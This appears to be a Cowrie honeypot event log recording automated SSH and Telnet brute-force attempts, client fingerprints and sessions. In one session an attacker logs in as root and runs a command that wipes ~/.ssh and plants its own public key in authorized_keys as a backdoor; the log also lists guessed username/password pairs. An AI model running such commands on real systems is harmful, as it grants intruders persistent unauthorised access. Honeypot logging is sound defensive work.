{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":42778,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ce112321279","protocol":"ssh","message":"New connection: 199.195.253.95:42778 (1.2.3.4:22) [session: 8ce112321279]","sensor":"my-vps","timestamp":"2025-08-28T18:09:11.452497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:09:11.456937Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:09:11.676582Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.login.success","username":"root","password":"As123456.","message":"login attempt [root/As123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:09:12.480315Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:09:12.855537Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:09:12.856262Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:09:12.857042Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.035285Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:09:13.421687Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.422442Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.564640Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.565510Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":43602,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d870591b83a","protocol":"ssh","message":"New connection: 199.195.253.95:43602 (1.2.3.4:22) [session: 4d870591b83a]","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.662779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.667069Z","src_ip":"199.195.253.95","session":"4d870591b83a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:09:13.763937Z","src_ip":"199.195.253.95","session":"4d870591b83a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:09:14.261522Z","src_ip":"199.195.253.95","session":"4d870591b83a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:09:15.420997Z","src_ip":"199.195.253.95","session":"4d870591b83a"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":44350,"dst_ip":"1.2.3.4","dst_port":22,"session":"27605ebd98eb","protocol":"ssh","message":"New connection: 199.195.253.95:44350 (1.2.3.4:22) [session: 27605ebd98eb]","sensor":"my-vps","timestamp":"2025-08-28T18:09:15.557261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:09:15.558901Z","src_ip":"199.195.253.95","session":"27605ebd98eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:09:15.705120Z","src_ip":"199.195.253.95","session":"27605ebd98eb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:09:16.311602Z","src_ip":"199.195.253.95","session":"27605ebd98eb"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:09:16.459682Z","src_ip":"199.195.253.95","session":"8ce112321279"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:09:16.460689Z","src_ip":"199.195.253.95","session":"27605ebd98eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55298,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ad6f731acfd","protocol":"ssh","message":"New connection: 212.227.125.160:55298 (1.2.3.4:22) [session: 8ad6f731acfd]","sensor":"my-vps","timestamp":"2025-08-28T18:09:39.081090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:09:39.081936Z","src_ip":"212.227.125.160","session":"8ad6f731acfd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:09:40.063855Z","src_ip":"212.227.125.160","session":"8ad6f731acfd"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-28T18:09:53.178959Z","src_ip":"212.227.125.160","session":"8ad6f731acfd"}
{"eventid":"cowrie.session.closed","duration":"15.4","message":"Connection lost after 15.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:09:54.471413Z","src_ip":"212.227.125.160","session":"8ad6f731acfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52411,"dst_ip":"1.2.3.4","dst_port":23,"session":"bebc5e3114ae","protocol":"telnet","message":"New connection: 212.227.235.229:52411 (1.2.3.4:23) [session: bebc5e3114ae]","sensor":"my-vps","timestamp":"2025-08-28T18:10:11.375383Z"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":50224,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fea5deb7c50","protocol":"ssh","message":"New connection: 171.243.150.220:50224 (1.2.3.4:22) [session: 7fea5deb7c50]","sensor":"my-vps","timestamp":"2025-08-28T18:10:12.467919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:10:12.527502Z","src_ip":"171.243.150.220","session":"7fea5deb7c50"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:10:13.585070Z","src_ip":"171.243.150.220","session":"7fea5deb7c50"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-28T18:10:14.237362Z","src_ip":"171.243.150.220","session":"7fea5deb7c50"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:10:15.472910Z","src_ip":"171.243.150.220","session":"7fea5deb7c50"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":39754,"dst_ip":"1.2.3.4","dst_port":22,"session":"31421635ad11","protocol":"ssh","message":"New connection: 199.195.253.95:39754 (1.2.3.4:22) [session: 31421635ad11]","sensor":"my-vps","timestamp":"2025-08-28T18:10:21.551997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:10:21.561779Z","src_ip":"199.195.253.95","session":"31421635ad11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:10:21.665035Z","src_ip":"199.195.253.95","session":"31421635ad11"}
{"eventid":"cowrie.login.failed","username":"qa","password":"qa","message":"login attempt [qa/qa] failed","sensor":"my-vps","timestamp":"2025-08-28T18:10:22.086267Z","src_ip":"199.195.253.95","session":"31421635ad11"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:10:23.219727Z","src_ip":"199.195.253.95","session":"31421635ad11"}
{"eventid":"cowrie.session.connect","src_ip":"121.157.204.54","src_port":60980,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed1f7b9a2af7","protocol":"telnet","message":"New connection: 121.157.204.54:60980 (1.2.3.4:23) [session: ed1f7b9a2af7]","sensor":"my-vps","timestamp":"2025-08-28T18:10:30.903404Z"}
{"eventid":"cowrie.session.connect","src_ip":"121.157.204.54","src_port":60981,"dst_ip":"1.2.3.4","dst_port":23,"session":"e789916464f8","protocol":"telnet","message":"New connection: 121.157.204.54:60981 (1.2.3.4:23) [session: e789916464f8]","sensor":"my-vps","timestamp":"2025-08-28T18:10:30.904602Z"}
{"eventid":"cowrie.session.closed","duration":31.217777967453003,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:10:42.593091Z","src_ip":"212.227.235.229","session":"bebc5e3114ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54094,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa0f0064f30e","protocol":"ssh","message":"New connection: 212.227.125.160:54094 (1.2.3.4:22) [session: aa0f0064f30e]","sensor":"my-vps","timestamp":"2025-08-28T18:10:43.961742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:10:43.963395Z","src_ip":"212.227.125.160","session":"aa0f0064f30e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","s